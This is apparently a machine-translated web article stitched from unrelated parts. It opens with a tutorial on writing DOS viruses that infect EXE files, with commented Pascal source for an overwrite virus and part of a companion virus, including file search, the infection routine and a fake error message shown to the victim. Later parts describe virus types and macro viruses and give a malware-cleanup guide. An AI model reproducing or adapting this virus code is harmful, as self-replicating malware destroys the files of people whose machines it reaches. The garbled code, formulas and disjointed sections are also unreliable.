Kako podesiti pametne telefone i računare. Informativni portal
  • Dom
  • Programi
  • Radnje na zaraženom fajlu. Zašto su makro virusi opasni i kako zaštititi svoj računar

Radnje na zaraženom fajlu. Zašto su makro virusi opasni i kako zaštititi svoj računar

Ovaj članak govori o virusi inficiranje EXE fajlovi. Klasifikacija takvih virusi, detaljno su razmotreni algoritmi njihovog rada, razlike između njih, prednosti i nedostaci.

Virusi- ovo je dobra gimnastika za um, iako mnogi ljudi misle šta da napišu virus na jeziku visokog nivoa je prilično teško. Ovo nije sasvim tačno. Pisanje u Pascal-u je prilično lako, ali veličina koda izaziva strahopoštovanje.

Za svaku vrstu virusi izvorni tekstovi su predstavljeni sa detaljnim komentarima, kao i osnovnim informacijama o strukturi i principima rada EXE programi.

COM fajlovi(mali programi napisani uglavnom u Assembleru) polako ali sigurno zastarevaju. Zamjenjuju ih zastrašujuće po svojoj veličini EHE-"Čudovišta". Postoje i virusi koji mogu zaraziti EXE fajlovi.

Struktura i proces učitavanja EXE programa

Za razliku od COM programi,EXE programi može se sastojati od nekoliko segmenata (kodovi, podaci, stek). Mogu biti veće od 64 KB. EXE fajl ima zaglavlje koje se koristi prilikom učitavanja. Zaglavlje se sastoji od formatiranog dijela koji sadrži potpis i podatke potrebne za učitavanje EXE fajl i tabele za konfigurisanje adresa ( Tablica za preseljenje). Tabela se sastoji od vrijednosti u segmentu formata: offset. Nakon učitavanja programa u memoriju, adresa segmenta s koje je program učitan mora se dodati pomacima u modulu za učitavanje, koji su naznačeni vrijednostima u tabeli.

Prilikom pokretanja EXE programi učitavač sistema (pozivanjem funkcije DOS 4Bh) izvodi sljedeće radnje:

1. Odrediti adresu segmenta slobodnog područja memorije, veličinu

što je dovoljno da se program prilagodi.

2. Blok memorije za varijable okruženja je kreiran i popunjen.

3. Kreira se blok memorije za PSP i program (segment SOOOO - PSP;

segment + OOYUOOOOOO - program).

Odgovarajuće vrijednosti se unose u PSP polja.

4. DTA adresa je postavljena na PSP: 0080h.

5. Formatirani dio se učitava u radni dio loadera

naslov EXE fajl.

6. Dužina modula za punjenje se izračunava pomoću formule:

Si7.e = ((PageCnt * 5i2) - (HdrSae * i6)) - Pa! TP3ig.

7. Određuje se pomak modula za učitavanje u datoteci, jednak

8. Izračunava se adresa segmenta (START_SEG) za učitavanje - obično je to PSP + lOh.

9. Učitavanje modula se učitava u memoriju (počevši od adrese

START_SEG: 0000).

10. Za svaki unos tabele podešavanja:

a) čitaju se riječi I_OFF i I_SEG;

b) izračunava se RELC ^ SEG-START ^ SEG + LSEG;

c) riječ se čita na adresi RELO_SEG: I_OFF;

d) START_SEG se dodaje pročitanoj riječi;

e) rezultat je pohranjen na istoj adresi (RELO_SEG: I_OFF).

11. Memorija za program se dodjeljuje u skladu sa MaxMet

12.Registri su inicijalizirani, program se izvršava:

b) AX = rezultat validacije identifikatora drajvera navedenih u komandnoj liniji;

c) SS ° START_SEG + ReloSS, SP-ExeSP;

d) CS = START_SEG + ReloCS, IP = ExeIP.

Klasifikacija EXE virusa

EXE virusi mogu se uslovno podijeliti u grupe, koristeći karakteristike algoritma kao osobinu za podjelu. VirusiOverwrite) Takav virusi već su postali retkost. Njihov glavni nedostatak je pregrub rad. Zaraženi programi se ne izvršavaju jer virus prepisuje programski kod bez spremanja. Prilikom pokretanja virus traži sljedeću žrtvu (ili žrtve), otvara pronađenu datoteku za uređivanje i upisuje njeno tijelo na početak programa bez spremanja originalnog koda. Zaraženi ovim virusi programi ne podliježu tretmanu.

Virusi pratioci

Ove virusi dobilo ime po algoritmu propagacije:

za svaku zaraženu datoteku kreira se prateći fajl. Razmotrimo detaljnije dvije vrste virusa ove grupe:

Virusi prvi tip reprodukuje na sledeći način. Za svaku zaraženu osobu EXE fajl datoteka sa virusnim kodom kreira se u istom direktoriju i ima isto ime kao EXE fajl ali sa ekstenzijom COM. Virus se aktivira ako je samo ime izvršne datoteke navedeno u komandnoj liniji prilikom pokretanja programa. Činjenica je da ako ekstenzija datoteke nije navedena, DOS prvo pretražuje trenutni direktorij za datoteku s datim imenom i ekstenzijom COM... Ako COM fajl sa ovim imenom nije pronađeno, u toku je potraga za istim imenom EXE fajl... Ako nije pronađen i EXE fajl, DOS će pokušati otkriti WAT(batch) fajl. Ako u trenutnom direktoriju ne postoji izvršna datoteka sa navedenim imenom, pretraga se izvodi u svim direktorijima kojima pristupa varijabla PUT... Drugim riječima, kada korisnik želi da pokrene program i unese u komandnu liniju samo njegovo ime (u suštini svi to rade), prvi koji će dobiti kontrolu je virusčiji je kod COM fajl... On stvara COM fajl na jednu ili više EXE fajlovi(širi se), a zatim izvodi EXE fajl sa imenom navedenim u komandnoj liniji. Korisnik misli da samo trčanje EXE program.

Za neutralizaciju satelitskog virusa prilično jednostavno - samo uklonite

COM fajl.

Virusi drugi tip je suptilniji. Zaraženo ime

EXE fajl ostaje isti, a proširenje je zamijenjeno nekim

osim izvršnog ( COM, EXE i BAT), Na primjer,

fajl može dobiti ekstenziju DAT(datoteka sa podacima) ili OVL(pro

gram overlay). Onda na svoje mesto EXE fajl kopirano virusna kod. Kada se takav zaraženi program pokrene, kontrola se daje virusna kod koji se nalazi u EXE fajl... Inficiranjem jednog ili više EXE fajlovi na isti način virus vraća izvršnu ekstenziju originalnoj datoteci (ali ne i E XE i COM, ukoliko EXE fajl sa ovim imenom je zauzet virusom), a zatim ga izvršava. Kada se zaraženi program završi, neizvršna ekstenzija se vraća u svoju izvršnu datoteku. Dezinfekcija fajlova zaražen ovom vrstom virusa može biti teško ako virus- satelit šifrira dio ili cijelo tijelo zaražene datoteke i dešifruje je prije izvršavanja.

Virusi ugrađen u program (parazitski) Virusi ovog tipa su najnevidljiviji: njihov kod je upisan u zaraženi program, što je bitno komplikuje tretman zaražene datoteke. Razmotrite metode implementacije EXE virusi u EXE datoteci.

Načini zaraze EXE datoteka

Najčešći način infekcije EXE fajlovi ovako: tijelo se dodaje na kraj datoteke virus, a zaglavlje je ispravljeno (zadržavajući originalno) tako da kada se zaražena datoteka pokrene, kontrola se daje virus... Izgleda kao infekcija COM fajlovi, ali umjesto specificiranja skoka na početak virusa u kodu, ispravlja se stvarna adresa tačke pokretanja programa. Nakon završetka rada, virus preuzima originalnu početnu adresu programa iz sačuvanog zaglavlja, dodaje vrijednost registra DS ili ES (primljenu na početku virusa) svojoj segmentnoj komponenti i prenosi kontrolu na primljenu adresu.

Sledeći način - Ubacivanje virusa na početak datoteke sa pomakom koda

programe. Mehanizam infekcije je sljedeći: tijelo zaraženog programa pročitano u memoriju, zapisano na svom mjestu virusni kod nakon čega slijedi šifra zaraženih programa s. Dakle, programski kod je, takoreći, "pomaknut" u datoteci za dužinu virusnog koda. Otuda i naziv metode - "metoda pomaka". Prilikom pokretanja zaražene datoteke virus inficira jednu ili više datoteka. Nakon toga čita programski kod u memoriju, upisuje ga u privremenu datoteku posebno kreiranu na disku s ekstenzijom izvršne datoteke ( COM ili EXE), a zatim izvršava tu datoteku. Kada program završi s radom, privremena datoteka se briše. Ako prilikom kreiranja virusa nisu primijenjene dodatne metode zaštite, tada je vrlo lako izliječiti zaraženu datoteku - samo izbrišite virusni kod na početku datoteke i program će ponovo raditi. Nedostatak ove metode je što morate pročitati cijeli kod zaraženog programa u memoriju (a postoje instance veće od 1MB).

Sljedeći način zaraze fajlova - način prijenosa - najvjerovatnije je najsavršeniji od svih navedenih. Virus reprodukuje na sledeći način: kada se pokrene zaraženi program, telo virus iz njega se čita u memoriju. Zatim se traži neinficirani program. Njegov početak se čita u memoriju, po dužini jednak tijelu virus... Tijelo je zapisano na ovo mjesto virus Početak programa iz memorije se dodaje na kraj datoteke. Otuda i naziv metode - "metoda prijenosa". Poslije virus zarazio jednu ili više datoteka, počinje izvršavati program iz kojeg je započeo. Da bi to učinio, čita početak zaraženog programa, pohranjen na kraju datoteke, i upisuje ga na početak datoteke, vraćajući funkcionalnost programa. Onda virus uklanja početni kod programa s kraja datoteke, vraća originalnu dužinu datoteke i izvršava program. Nakon što se program završi, virus ponovo upisuje svoj kod na početak datoteke, a originalni početak programa na kraj. Čak antivirusi, koji provjeravaju integritet svog koda od pokretanja virus program ima potpuno isti kod kao i prije infekcije.

Virusi zamjena programskog koda ( Overwrite) Kao što je već spomenuto, ovaj pogled virusi je odavno mrtav. Povremeno ih još ima virusi stvoreno na jeziku Asembler, ali to je prije takmičenje u pisanju najmanjih prepisati virus... Trenutno najmanji poznati prepisati viruse napisao Podsjetnik (grupa Death Virii Crew) i zauzima 22 bajta.

Algoritam za virus prepisivanja je sljedeći:

1. Otvorite datoteku iz koje je virus preuzeo kontrolu.

3. Zatvorite datoteku.

4. Pretražite po maski datoteku prikladnu za infekciju.

5. Ako nema više datoteka, idite na korak 11.

6. Otvorite pronađenu datoteku.

7. Provjerite je li pronađena datoteka zaražena ovim virusom.

8. Ako je datoteka zaražena, idite na korak 10.

9. Napišite šifru virusa na početak datoteke.

10. Zatvorite datoteku (ako želite, možete zaraziti od jedne do svih datoteka

ribolov u direktoriju ili na disku).

11. Prikažite bilo koju poruku o grešci, na primjer, "Nenormalan završetak programa" ili "Nema dovoljno memorije" - neka korisnik ne bude previše iznenađen što program nije pokrenut.

12. Završite program.

Ispod je lista programa koji inficira datoteke na ovaj način.

($ M 2048, 0, 0)

(Koriste se DOS i System moduli (sistemski modul se automatski pridružuje svakom programu prilikom kompilacije))

(ime virusa)

VirName = 'Bol';

(String za provjeru ponovne infekcije.

Dodaje se zaraženoj datoteci odmah nakon koda virus}

VirLabel: String = 'Bol! 1;

(Dužina sastavljenog EXE fajl}

Author = 'Prljavi naci / SGWW.';

(Broj fajlova zaraženih tokom jedne sesije)

(Niz za utvrđivanje postoji li kopija virus u pronađenom fajlu)

Virldentifier: niz znakova;

(Varijabla fajla za rad sa fajlovima)

(Još jedna varijabla fajla - iako biste mogli i bez nje, ovako će vam biti jasnije)

(Za naziv pronađene datoteke)

TargetFile: PathStr;

(Buffer za tijelo virus)

VirBuf: Niz [-I.VirLen] od Char;

(Za datum/vrijeme fajla)

(Brojač broja zaraženih fajlova)

Dirlnfo: SearchRec;

LabelBuf: Niz znakova;

(inicijalizacija)

LabelBuf: = VirLabel;

LabelBuf: = VirLabel;

LabelBuf: = VirLabel,

LabelBuf: = VirLabel;

LabelBuf: = VirLabel;

(Resetujemo brojač količine zaražene datoteke}

(Varijablu datoteke VirBody vežemo s imenom programa iz kojeg smo krenuli)

Dodijeli (VirBody, ParamStr (O));

(Otvori fajl sa recsize = 1 bajt)

Reset (VirBody, 1);

(Čitamo tijelo iz datoteke virus na VirBuf niz)

BlockRead (VirBody VirBuf, VirLen);

(Zatvorite fajl)

(Potraga za žrtvom)

procedura FindTarget;

(Funkcija vraća True ako je pronađeni program već zaražen, i False ako već nije)

funkcija VirusPresent: Boolean;

VirusPresent: = False;

(Otvorite pronađeni fajl)

Dodijeliti (Target, TargetFile);

Reset (Cilja, 1);

(Pređite na dužinu tela virus od početka fajla)

Traži (Target, VirLen);

(Čitamo 5 bajtova - ako je datoteka već zaražena, postoji oznaka virus}

BlockRead (Target, Virldentifier, 5);

Ako je Virldentifier = Virl_abel Onda

(Ako postoji oznaka, postoji i virus}

VirusPresent: = Tačno;

(procedura infekcije)

procedure InfectFile;

(Ako je veličina pronađene datoteke manja od dužine virusa plus 100 bajtova, izađite iz procedure)

Ako Sr.Size< VirLen+100 Then Exit;

Ako pronađeni program još nije zaražen, mi ga inficiramo)

Ako nije VirusPresent Onda

(Zapamtimo datum i vrijeme fajla. Nema potrebe da pamtimo atribute, jer se pretraga vrši među datotekama sa atributom Arhiva, a ovaj atribut se u svakom slučaju postavlja na fajl nakon pohranjivanja)

(Otvor za infekciju)

Dodijeliti (Target, TargetFile);

Reset (Cilja, 1);

(Zapisujemo tijelo virus na početak fajla)

BlockWrite (Target, VirBuf, VirLen);

(Pomeramo pokazivač trenutne pozicije i dužine virus od početka fajla)

Traži (Target, VirLen);

(Unosimo oznaku infekcije)

BlockWrite (Target, LabelBuf, 5);

(Podesite datum i vrijeme fajla)

SetFTime (cilj, vrijeme);

(Zatvori)

(Povećavamo brojač zaražene datoteke}

(Početak procedure FindTarget)

(Tražimo datoteke u trenutnom direktoriju po maski * .EXE

sa atributima Arhiva}

FindFirstF.EXE ', Archive, Sr);

(Sve dok postoje fajlovi za zarazu)

Dok je DosError = 0 Do

Ako Sr.Name = "Onda izađi;

(Sjećamo se imena pronađene datoteke u varijabli TargetFile)

TargetFile: = Sr.Name;

(Mi zovemo proceduru infekcije)

(Ako su InfCount datoteke zaražene, dovršite pretragu)

Ako InfFiles> InfCount Then Exit;

(Tražimo sljedeći fajl po maski)

(Glavni dio)

(Inicijalizacija)

(Tražimo žrtve i zarazimo ih)

(Prikazivanje poruke o grešci)

WriteLn („Nenormalan završetak programa.“);

(Ovo je za kompajler da ubaci VirName i Author konstante u kod, dok je uslov postavljen na takav način da se ti redovi nikada neće prikazati na ekranu)

WriteLn (VirName);

WriteLn (Autor);

Virusi pratioci

Satelitski virusi sada široko rasprostranjen - odnos pratioca i parazita virusi otprilike jedan do dva. Infekcija stvaranjem COM fajl pratilac Značenje ove metode je bez dodirivanja "mačke stranca" ( EXE program), kreirajte "svoje" - COM fajl Sa imenom EXE programi... Algoritam takvog virus krajnje jednostavno, jer nema potrebe za nepotrebnim radnjama (na primjer, čuvanje dužine prevedenog EXE fajl With virusni kodčitanje u tjelesni bafer virus, pokretanje datoteke iz koje virus dobio kontrolu). Ne morate čak ni pohraniti oznaku da biste utvrdili da li je datoteka zaražena.

Infekcija se vrši pomoću komandnog procesora:

1. Ako postoje parametri na komandnoj liniji, spremite ih u varijablu String koja će biti proslijeđena zaraženom programu.

2.Pronađi EXE fajl- žrtvovanje.

3.Provjerite da li je direktorij sa pronađen EXE fajl COM fajl sa istim imenom kao i fajl žrtve.

4.Ako je tako COM fajl prisutan, datoteka je već zaražena, idite na

do tačke 6.

5. Koristeći komandni procesor, kopirajte datoteku iz koje

dobijenu kontrolu, u datoteku sa imenom i ekstenzijom žrtve COM.

6.Procedura Ehes učitajte i izvršite datoteku sa imenom početne, ali sa ekstenzijom EHE- odnosno izvršite zaraženi program.

7. Vratite kontrolu na DOS.

Listing ispod pokazuje zarazu datoteka sa ovim

($ M 2048, 0, 0)

(Koriste se moduli DOS i System (modul System je automatski

povezuje se sa svakim programom prilikom kompilacije))

(ime virusa)

VirName = 'Guesf;

Autor = 'Dirty Nazi / SGWW. 4 samo PVT!';

(Količina inficiran za jednu sesiju fajlova)

(Za naziv pronađene datoteke)

TargetFile: PathStr;

Kompjuterski virus može pokvariti, tj. nepropisno izmijenite bilo koju datoteku na diskovima vašeg računara. Ali virus može "zaraziti" neke vrste datoteka. To znači da se virus može "infiltrirati" u ove datoteke, tj. modificirati ih tako da sadrže virus koji pod određenim okolnostima može početi djelovati. Treba napomenuti da tekstovi programa i stare verzije dokumenata (takoreći DOS verzije), informacijske datoteke baza podataka, tabele procesora tablica (DOS verzije) i druge slične datoteke ne mogu biti zaražene virusom, već samo pokvariti njima.

Sljedeće vrste datoteka mogu biti "zaražene" virusom:

1) Izvršne datoteke

Izvršni fajlovi, tj. datoteke sa ekstenzijama naziva COM i EXE, kao i datoteke preklapanja koje se učitavaju kada se izvršavaju drugi programi. Virusi koji inficiraju datoteke nazivaju se virusima datoteka. Virus u zaraženim izvršnim datotekama počinje sa radom kada se pokrene program u kojem se nalazi. Najopasniji su oni virusi koji ostaju u memoriji nakon pokretanja. Ovi virusi mogu zaraziti datoteke i oštetiti ih do sljedećeg ponovnog pokretanja računala. A ako zaraze bilo koji program koji je pokrenut iz datoteke AUTOEXEC.BAT ili CONFIG.SYS, onda kada ponovo pokrenete sistem sa tvrdog diska, virus će ponovo započeti svoj rad.

2) Učitavač operativnog sistema i glavni zapis za pokretanje hard diska

Virusi koji inficiraju ova područja nazivaju se boot virusi ili virusi ruševina. Takav virus počinje svoj rad pri početnom pokretanju operativnog sistema i postaje memorijski rezident, tj. nalazi se u memoriji računara. Mehanizam distribucije - infekcija boot zapisa disketa ubačenih u računar. Tipično, ovi virusi se sastoje od dva dijela jer su zapisi o pokretanju mali i teško je u njih smjestiti cijeli virusni program. Dio virusa koji ne stane u njih nalazi se u drugom dijelu diska, na primjer, na kraju korijenskog direktorija diska ili u klasteru u području podataka diska (obično kao klaster je proglašen neispravnim tako da virusni program ne bude prepisan kada se podaci upisuju na disk).

3) Drajveri uređaja:

Drajveri uređaja, tj. datoteke navedene u klauzuli DEVICE datoteke CONFIG.SYS. Virus u njima počinje svoj rad sa svakim pristupom odgovarajućem uređaju. Virusi koji inficiraju drajvere uređaja su veoma retki jer se drajveri retko prepisuju sa jednog računara na drugi. Isto važi i za DOS sistemske fajlove (MSDOS.SYS i IO.SYS) - njihova infekcija je takođe teoretski moguća, ali je neefikasna za širenje virusa.

4) INTERNET virusi

Nedavno su se pojavili porast broja korisnika. Neke od varijanti ovih virusa su:

4.1 Priloženi fajlovi... Razmislite o tipičnom scenariju: primite e-poruku sa Microsoft WORD dokumentom priloženim kao prilogom. Naravno, poželećete da se brzo upoznate sa sadržajem datoteke, jer kada koristite većinu modernih programa za poštu, samo treba da kliknete na naziv ove datoteke.

A OVO JE GREŠKA!

Ako datoteka sadrži makro virus (a virusi ovog tipa koji inficiraju Microsoft WORD, Microsoft EXCEL dokumente i niz drugih popularnih sistema za upravljanje dokumentima su nedavno postali široko rasprostranjeni), on će odmah zaraziti vaš sistem. Dakle, šta radite sa priloženim dokumentom? Odvojite nekoliko dodatnih sekundi: sačuvajte ga na disk, provjerite najnovijim antivirusnim programom i tek onda, ako nema virusa, otvorite ga. Postoje i druga rješenja. Na primjer, postoje antivirusni programi koji automatski provjeravaju dolaznu e-poštu. Ako koristite watchdog program, onda kada otvorite zaraženu datoteku, sigurno ćete dobiti upozorenje (tačnije, jednostavno vam neće biti dozvoljeno da otvorite zaraženu datoteku). Na kraju krajeva, čuvaru je potpuno svejedno hoćete li dokument otvoriti direktno ili "ispod" mail programa.

4.2 Trojanci... Poznati trojanci koji se šire Internetom su u suštini uslužni programi za udaljenu administraciju računara. Jednostavno rečeno, preko takvog programa napadač može pristupiti vašem računaru i izvršiti razne operacije (skoro bilo koje) na njemu bez vašeg znanja i učešća.

Tipičan predstavnik opisanog tipa je program BASK ORIFICE (BO). BO je sistem daljinske administracije koji omogućava korisniku da kontroliše računare koristeći konvencionalnu konzolu ili grafičku ljusku. "Na lokalnoj mreži ili putem Interneta, VO pruža korisniku više mogućnosti na udaljenom WINDOWS računaru nego korisniku samog ovog računara" je tekst iz "oglasnog" oglasa na jednoj od hakerskih web stranica. Naravno, mogućnost daljinske administracije vašeg računara predstavlja ozbiljnu opasnost, ali ne toliko velika kao što se čini na prvi pogled. Redovni korisnici ne provode mnogo vremena na internetu (kvalitet telefonskih linija doprinosi tome), a šta je to tako "zanimljivo" sa stanovišta hakera da možete da radite na svom računaru? Ispostavilo se da možete, ali ne morate ništa da administrirate. Od značajnog interesa za hakera su lozinke koje koristite za rad sa serverom provajdera. Nakon što dobije lozinku, haker može lako "probaciti" sav vaš novac. Srećom, postoji dosta trojanaca koji mogu obavljati ove funkcije, a antivirusni programi ih sve uspješno otkrivaju.

4.3 HTML virusi. Virusi ovog tipa su rijetki, pa su informacije o njima više "akademski" nego praktični. Suština je sledeća: u samom jeziku HTML, koji se koristi za označavanje hipertekstualnih dokumenata, nikakvi virusi se, naravno, ne mogu napisati. Ali za kreiranje dinamičkih stranica, organiziranje interakcije korisnika i drugih radnji, koriste se programski umetci (skriptovi) u HTML dokumente. Poznati HTML virusi koriste skripte napisane na jeziku VISUAL BASIC. Uz njihovu pomoć, pronalazi HTM i HTML datoteke na lokalnoj mašini i piše u njih. Ponekad se ovi virusi manifestiraju na neki način (na primjer, prikazuju poruke). Malo širenje virusa ove vrste (kao i njihov mali broj) je olakšano činjenicom da je u standardnim postavkama pretraživača zabranjeno izvršavanje "opasnih" skripti (uključujući i one kojima se pristupa datotekama na lokalnom računaru). Redovne "sigurnosne" skripte ne mogu izvršiti opisane manipulacije.

4.4 Java virusi... Trenutno postoje dva poznata virusa napisana na jeziku JAVA. Oni praktično nisu opasni. Hajde da ukratko objasnimo šta je poenta: izvršni moduli programa napisanih u JAVA (CLASS fajlovi) su dve vrste: aplikacije i apleti. Aplikacije se pokreću pod kontrolom tumača i gotovo su obični programi (skoro, jer još uvijek imaju neka ograničenja, na primjer, u području rada s memorijom). Apleti, za razliku od aplikacija, mogu se pokretati pod kontrolom pretraživača, ali im se nameću mnogo ozbiljnija sigurnosna ograničenja: apleti, posebno, nemaju gotovo nikakav pristup sistemu datoteka računara (za razliku od slučaja sa skriptama, onemogućite ovo ograničenje u pretraživač nemoguć), pa JAVA virusi mogu biti dizajnirani samo kao aplikacije i ne predstavljaju nikakvu opasnost za veliku većinu korisnika. Tipično, svaki određeni tip virusa može zaraziti samo jednu ili dvije vrste datoteka. Najčešći virusi su oni koji inficiraju izvršne datoteke. Neki virusi inficiraju samo EXE datoteke, neki samo COM, a većina oboje. Boot virusi su na drugom mjestu po učestalosti. Neki virusi inficiraju i datoteke i područja za pokretanje diska. Virusi koji inficiraju drajvere uređaja su izuzetno rijetki; obično takvi virusi mogu zaraziti i izvršne datoteke.

Makrovirusi su potencijalno neželjeni uslužni programi napisani na mikro jezicima koji su ugrađeni u sisteme za obradu grafike i teksta. Koje datoteke makro virusi inficiraju? Odgovor je očigledan. Najčešći verzije za Microsoft Excel, Word i Office 97. Ovi virusi su prilično česti, kako ih stvoriti lako kao ljuštenje krušaka. Zato treba biti izuzetno oprezan i tačan kada preuzimate dokumente sa interneta. Većina korisnika ih podcjenjuje, čineći tako veliku grešku.

Kako se računar inficira?

Nakon što smo odlučili šta su makro virusi, hajde da vidimo kako oni prodiru u sistem i zaraze računar. Jednostavan način njihove reprodukcije omogućava pogađanje maksimalnog broja objekata u najkraćem mogućem vremenu. Zahvaljujući mogućnostima makro jezika, prilikom zatvaranja ili otvaranja zaraženog dokumenta, oni prodiru u programe kojima se pristupa.

Odnosno, kada koristite grafički uređivač, makro virusi inficiraju sve što je s njim povezano. Štaviše, neki su aktivni sve vreme dok uređivač teksta ili grafike radi, ili čak dok se računar potpuno ne isključi.

Koji je princip njihovog rada

Njihovo djelovanje odvija se po sljedećem principu: prilikom rada s dokumentima, Microsoft Word izvršava različite komande koje su date na makro jeziku. Prije svega, program prodire u glavni predložak, kroz koji se otvaraju sve datoteke ovog formata. U ovom slučaju, virus kopira svoj kod u makroe koji omogućavaju pristup glavnim parametrima. Izlaskom iz programa, datoteka se automatski pohranjuje u tački (koristi se za kreiranje novih dokumenata). Zatim ulazi u standardne makroe, pokušavajući presresti komande poslane drugim datotekama, inficirajući i njih.

Infekcija se provodi u sljedećim slučajevima:

  1. Ako u virusu postoji automatski makro (izvodi se u automatskom načinu kada se program isključi ili pokrene).
  2. Virus ima osnovni sistemski makro (često povezan sa stavkama menija).
  3. Aktivira se automatski kada pritisnete određene tipke ili kombinacije.
  4. Umnožava se tek kada počne.

Takvi virusi obično inficiraju sve datoteke kreirane i povezane s programima na makro jeziku.

Kakvu štetu čine

Makroviruse ne treba podcijeniti, jer se smatraju punopravnim virusima i nanose značajnu štetu računarima. Oni mogu lako brisati, kopirati ili uređivati ​​sve objekte koji sadrže, uključujući lične podatke. Osim toga, oni također imaju pristup prijenosu informacija drugim ljudima putem e-pošte.

Jači uslužni programi općenito mogu formatirati čvrste diskove i kontrolirati rad cijelog PC-a. Zbog toga je pogrešno mišljenje da ova vrsta kompjuterskih virusa predstavlja prijetnju isključivo grafičkim i tekstualnim uređivačima. Na kraju krajeva, uslužni programi kao što su Word i Excel rade u sprezi s nizom drugih, koji su u ovom slučaju također u opasnosti.

Prepoznavanje zaražene datoteke

Često nije teško identificirati datoteke koje su zaražene makro virusima i podlegle njihovom utjecaju. Uostalom, funkcionišu sasvim drugačije od ostalih uslužnih programa istog formata.

Opasnost se može prepoznati po sljedećim znakovima:

Osim toga, prijetnje se često lako otkrivaju vizualno. Njihovi programeri obično daju informacije kao što su naziv uslužnog programa, kategorija, predmet komentara i ime autora u kartici "Sažetak", što olakšava i brže uklanjanje makro virusa. Može se pozvati pomoću kontekstnog menija.

Metode uklanjanja

Ako pronađete sumnjivu datoteku ili dokument, prvo ih skenirajte antivirusom. Ako se otkrije prijetnja, antivirusi će pokušati da je izliječe, a ako ne uspije, potpuno će joj zatvoriti pristup.

Ako je cijeli računar zaražen, trebali biste koristiti disk za hitno pokretanje koji sadrži antivirus s najnovijom bazom podataka. Skeniraće vaš čvrsti disk i neutralisati sve pretnje koje pronađe.

Ako se ne možete zaštititi na ovaj način, vaš antivirus ne može ništa, a nema diska za spašavanje, pokušajte sa metodom "ručnog" tretmana:


Na taj način ćete ukloniti makro virus iz zaraženog dokumenta, ali to ni na koji način ne znači da nije ostao u sistemu. Zato se preporučuje, što je pre moguće, skeniranje celog personalnog računara i svih njegovih podataka antivirusom ili (njihova prednost je što ne zahtevaju instalaciju).

Proces izlječenja i čišćenja računala od infekcije makro virusima je prilično složen, pa je bolje spriječiti infekciju u početnim fazama.


Tako ćete biti sigurni, a makro virusi se nikada neće infiltrirati u odgovarajuće datoteke.

Video o čišćenju sistema od virusa

Koristeći savjete "Kako očistiti zaraženi računar" date u ovom članku, možete ukloniti bilo koju vrstu zlonamjernog softvera sa svog računala i vratiti ga u radno stanje

1. Provjerite je li vaš računar zaista zaražen

Pre nego što pokušate da uklonite bilo kakvu infekciju sa svog računara, morate se uveriti da je računar zaista zaražen. Da biste to učinili, pogledajte smjernice koje dajem u članku "". Ako ovo zaista pokazuje da je vaš računar zaražen, nastavite s koracima u sljedećem odjeljku. Pobrinite se da ih slijedite u ispravnom redoslijedu.

2. Kako očistiti računar i uvjeriti se da je zaista čist

Imajte na umu da napredni korisnici ovdje mogu jednostavno preskočiti na posljednji dio o tome kako pravilno očistiti računar. Ovo je najsnažniji pristup, ali je i jedan od najzahtjevnijih. Međutim, ako je potrebno, možete otići direktno na taj odjeljak, a zatim se ponovo vratiti na početak ako infestacija nije u potpunosti uklonjena.

2.1 Čišćenje vašeg računara sa CCE i TDSSKiller

Preuzmite Comodo Cleaning Essentials (CCE) sa ove stranice. Obavezno odaberite ispravnu verziju za svoj operativni sistem. Ako niste sigurni koji operativni sistem radi na vašem računaru - 32-bitni ili 64-bitni - pogledajte. Takođe, preuzmite Kaspersky TDSSKiller sa ove stranice. Ako ne uspijete da preuzmete bilo koji od ovih programa, ili ako vaša internetska veza ne radi, morat ćete to učiniti na drugom računalu i prenijeti na zaraženi pomoću fleš diska. Uvjerite se da na fleš disku nema drugih datoteka. Budite oprezni sa svojim flash uređajem jer ga zlonamjerni softver može zaraziti kada ga umetnete u računar. Stoga ga nemojte povezivati ​​ni sa jednim drugim računarom nakon prenosa ovih programa. Takođe, želim da istaknem da su oba programa prenosiva. To znači da kada završite s njihovim korištenjem, ne morate ih deinstalirati. Samo izbrišite njihove foldere i oni će biti izbrisani.

Nakon što preuzmete CCE, raspakirajte datoteku, otvorite mapu i dvaput kliknite na datoteku pod nazivom "CCE". Otvoriće se glavni prozor Comodo Cleaning Essentials. Ako se ne otvori, držite pritisnut tipku Shift i dvaput kliknite na datoteku pod nazivom "CCE". Nakon što se CCE uspješno otvori, možete otpustiti tipku Shift. Međutim, nemojte ga otpuštati dok se program u potpunosti ne učita u memoriju. Ako ga otpustite barem tokom UAC zahtjeva, neće se moći ispravno otvoriti, čak ni prinudnom metodom. Držanje Shift će pomoći da se otvori čak i na jako zaraženim računarima. To čini potiskivanjem mnogih nepotrebnih procesa koji bi mogli spriječiti njegovo pokretanje. Ako to i dalje ne pomogne pri pokretanju, preuzmite i pokrenite program pod nazivom RKill. Može se preuzeti sa ove stranice. Ovaj program će zaustaviti poznate zlonamjerne procese. Dakle, nakon pokretanja, CCE bi trebao savršeno pokrenuti.

Kada se pokrene, uradite Smart Scan u CCE-u i stavite u karantin sve što pronađe. Ovaj program također razmatra sistemske promjene koje je mogao napraviti zlonamjerni softver. Oni će biti prikazani u rezultatima. Predlažem da dozvolite programu da popravi i to. Ponovo pokrenite računar kada se to od vas zatraži. Nakon ponovnog pokretanja računara, pokrenite Kaspersky TDSSKiller, skenirajte i stavite u karantin ono što će se naći.

Također, ako vaša internetska veza ranije nije radila, provjerite radi li sada. Trebat će vam važeća internetska veza za sljedeće korake u ovom odjeljku.

Kada se CCE skeniranje završi i kada ste zadovoljni da vaša internetska veza radi, ponovo otvorite CCE. Nadamo se da će se ovaj put otvoriti, ali ako ne, onda ga otvorite držeći pritisnutu tipku Shift. Zatim iz menija "Alati" u CCE otvorite KillSwitch. U KillSwitchu, iz menija "Prikaz", odaberite opciju "Sakrij sigurne procese". Zatim desnom tipkom miša kliknite na sve procese koji su označeni kao sumnjivi ili opasni i odaberite opciju da ih uklonite. Također biste trebali kliknuti desnim tasterom miša na sve nepoznate procese koji ostanu i odabrati opciju "Kill Process". Nemojte brisati procese označene kao FLS.Unknown. Zatim, u CCE-u, iz menija Alati, pokrenite Autorun Analyzer i izaberite opciju "Sakrij sigurne unose" iz menija "Prikaz". Zatim onemogućite sve stavke koje pripadaju datotekama koje su označene kao sumnjive ili opasne. To možete učiniti tako što ćete poništiti okvire pored stavki. Također biste trebali onemogućiti sve stavke označene kao FLS.Unknown, ali za koje mislite da najvjerovatnije pripadaju zlonamjernom softveru. Nemojte brisati nijednu stavku.

